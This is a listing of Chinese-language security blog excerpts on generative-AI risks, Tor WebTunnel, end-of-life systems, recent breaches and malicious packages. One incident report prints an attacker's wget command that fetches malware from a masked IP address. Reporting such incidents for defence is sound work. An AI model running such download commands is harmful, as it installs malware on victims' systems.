• 生成式AI(Generative AI)是一種利用機器學習技術來生成新的內容的人工智能技術。這些內容包括文字、圖像、聲音、影片等等。生成式AI模型,例如生成對抗網絡(GANs)和變分自編碼器(VAEs),通過學習大量的訓練數據來創建與訓練數據相似但全新的內容。這樣的技術,對資安卻帶來新的風險。 生成式AI的資安風險 新的AI科技帶來了便利性,但相對的,它也帶來了新的資安威脅。如何正確防禦此類新型態的攻擊,將是大家必須嚴正關注的要事!

    Continue reading →: 生成式AI(Generative AI Risks)的資安風險
  • Tor發布了WebTunnel,這是一種新型的Tor橋接,旨在幫助位於網路審查區域的使用者連接到Tor網路(WebTunnel是一種抗審查的傳輸工具)。它可以模仿加密的網路流量(HTTPS),受到HTTPT(https://www.usenix.org/conference/foci20/presentation/frolov)的啟發而設計。它通過將有效負載連接包裝成類似於WebSocket的HTTPS連接來運作,對網路觀察者呈現為普通的HTTPS(WebSocket)連接。因此,對於沒有隱藏路徑知識的旁觀者來說,它看起來就像是與網頁伺服器的常規HTTP連接,給人一種用戶只是在瀏覽網路的印象。 事實上,WebTunnel與普通的網路流量非常相似,因此當有人嘗試訪問共享網路地址上的網站時,他們將只能感知到該網站地址的內容,並不會注意到秘密橋梁(WebTunnel)的存在。 因相關技術亦可能遭受駭客利用,將敏感資訊從組織內部外傳,因此預期Tor WebTunnel對企業的資安來說,將會是一項新的挑戰。 相關內容請參考: https://community.torproject.org/relay/setup/webtunnel/

    Continue reading →: WebTunnel BridgeTor發布
  • 使用安全的隨機函式(secure random)可產生安全的隨機數字(infeasible to predict),對於確保各種應用程式中的敏感資訊的完整性(integrity)、機密性(confidentiality)至關重要。以下是一些重要性的原因: 總結來說,使用安全的隨機函式對於維護依賴於隨機性的系統和應用程式的安全性、隱私性和完整性至關重要,這些系統和應用程式用於加密操作、抵抗攻擊、會話管理、遵守法規和保護用戶隱私。

    Continue reading →: 為何需要使用安全的隨機函式(Secure Random Function)?
  • 我們在為客戶進行資安檢測時,常被問到的問題之一,即是「為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?」 許多公司仍使用Windows XP、CentOS 8,以及其他已停止支援的系統或應用程式。而光盾在檢測時,往往會依照最新版的CVSS評分,將此類問題列入漏洞。 我們常檢測出未有被發布CVE的系統,包含了「主機控制漏洞」,讓駭客可以任意遠端操作主機。但在通報廠商後,廠商表示系統已停止維護,不會進行任何修正。這表示多數停止維護的系統,很可能包含諸多潛藏的零時差漏洞,不會有相關CVE資訊,且永遠不會獲得修正、難以控管。 使用已經停止維護的系統會被認為是重大漏洞的原因主要有以下幾點: 因此,為了確保系統的安全性和穩定性,建議大家使用並維護最新版本的軟體和作業系統,以及及時應用安全更新和修補程式。

    Continue reading →: 為何使用已經停止維護(EOL)的系統,會被認為是重大漏洞?
  • 根據新聞報導,一個俄羅斯的駭客組織,名為午夜暴風雪(Midnight Blizzard),又被稱為諾貝爾姆(Nobelium),駭入微軟主管、法律部門的電子信箱中。 這是駭客主要的入侵途徑: 從2023年11月底開始,駭客使用密碼噴灑攻擊(password spray)來入侵一個測試帳號中,建立據點,然後使用該帳戶的權限來入侵微軟的其他企業郵件帳戶,包含主管、法律部門等。駭客亦洩露了一些郵件和附件內容。 由此可見,系統的強度僅等同於最弱的環節。測試用的系統、服務、帳號均應使用「最小權限原則」(Principle of least privilege),防止攻擊者加以利用(最小權限原則是要求計算環境中的每個模組如用戶或電腦程式只能存取當下所必需的訊息或者資源)。 相關連結: https://www.csoonline.com/article/1296269/russia-based-group-hacked-emails-of-microsofts-senior-leadership.html

    Continue reading →: 俄羅斯駭客駭入微軟主管的電子郵件信箱
  • 光盾研究員不斷發現駭客利用系統漏洞,嘗試於各式系統中植入新型惡意程式。近期一個案例,是攻擊者利用上傳功能,在系統中植入Unix.Virus.Ladvix。此病毒會在Unix系統中挖礦,且駭客可遠端控制受駭的電腦、置入更多惡意檔案。 在另一個例子中,駭客利用了主機控制漏洞(OS Commanding),使用以下指令,控制主機下載病毒(原始IP位址已被遮蔽): wget http://x.x.x.x/df2vGJJ58ivF 由VirusTotal進行偵測,可發現僅一支防毒軟體能正確偵測此支病毒: 防止此類問題需要利用深層防禦(Defense in Depth)的概念。深度防禦(DiD)是一種資訊安全的方法,其中一系列的防禦機制被層層堆疊,以保護有價值的數據和資訊。如果一個機制失效,另一個立即介入以阻止攻擊。這種多層次的方法可提高系統整體的安全性,並應對許多不同的攻擊維度。舉例來說,除了應用程式防火牆、IPS/IDS、防毒之外,主機亦應布署監控機制,偵測並阻擋未知的「內往外」連線。 此外,為防止系統包含重大漏洞,定期的滲透測試、弱點掃描均為必須。這些方式能在駭客破解漏洞之前,先了解問題並修補系統。

    Continue reading →: 駭客利用系統漏洞植入新型惡意程式
  • 鴻海集團旗下半導體設備大廠京鼎(3413)遭駭客入侵。根據駭客留在官網的資訊,表示如果京鼎不支付費用,客戶資料將被公開。下面是官網遭駭的原始截圖: 相關新聞網址: https://infosecu.technews.tw/2024/01/16/foxsemicon-been-hacked/

    Continue reading →: 駭客入侵半導體大廠京鼎網站
  • 源碼檢測、弱點掃描和滲透測試是與系統安全相關的不同檢測方式,因此適用性、可檢測的內容、需要時程等等都不一樣。以下是它們的主要區別: 總體而言,源碼檢測主要關注源碼層面的問題,弱點掃描側重於已知漏洞的識別,而滲透測試則模擬實際攻擊,通過多個角度評估系統的安全性。這三者通常作為綜合的安全測試策略的一部份,以提高整體安全性。

    Continue reading →: 源碼檢測、弱點掃描和滲透測試有什麼不同?
  • 光盾研究室發現愈來愈多惡意軟體放置在GitHub、Dropbox、Google Drive、OneDrive和Discord等等服務中,藉由加密、亂碼化等方式規避這些平台的檢測工具。接著,駭客利用系統漏洞或社交工程,在受害系統上植入這些程式。而不少惡意程式在VirusTotal上的檢測率為0%。一些惡意程式會偽裝成正常程式,使相關應對、查核變得更加困難(例如: 光盾研究室發現一惡意程式偽裝成遠端桌面軟體,已有數萬次下載)。 此外,眾多PyPI,例如: httprequesthub、pyhttpproxifier、libsock、libproxy和libsocks5,它們偽裝成用於處理網路代理的函式庫,並將電腦的敏感資料傳給駭客。這是其中一個連結: https://security.snyk.io/vuln/SNYK-PYTHON-HTTPREQUESTHUB-6139265。 此類狀況有爆炸型成長趨勢,且光盾研究室亦發現諸多程式碼已被塞入惡意連結。例如,”jsapi.info”即被光盾檢測出曾被植入重大系統中(因開發人員直接include第三方函式庫),但此網域於2022年為駭客所控制,專門用來散播新型惡意程式。 有鑑於此,完整的第三方元件的查核、滲透測試等等,在系統上線前進行,都非常重要。採取有效的控管方式,方可根本預防此類重大問題。

    Continue reading →: 駭客利用GitHub程式入侵系統